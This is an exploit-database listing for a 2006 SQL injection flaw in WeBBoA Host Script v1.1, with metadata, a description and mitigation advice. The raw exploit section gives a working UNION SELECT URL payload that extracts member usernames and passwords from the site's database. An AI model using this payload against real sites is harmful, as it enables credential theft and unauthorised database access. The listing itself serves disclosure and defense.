header-logo
Suggest Exploit
vendor:
Host Script
by:
EntriKa
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Host Script
Affected Version From: v1.1
Affected Version To: v1.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Sql injection WeBBoA Host Script v1.1

An attacker can exploit a SQL injection vulnerability in WeBBoA Host Script v1.1 to gain access to sensitive information. By sending a specially crafted HTTP request to the vulnerable application, an attacker can execute arbitrary SQL commands in the back-end database. This can be used to access or modify data in the back-end database, or to gain access to the underlying file system and operating system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# There is Sql injection WeBBoA Host Script v1.1
# Risk=High
 
# Exploit:
http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1
 
# Credit: EntriKa

# milw0rm.com [2006-06-19]

Navigation

Suggest Exploit

Services By CQR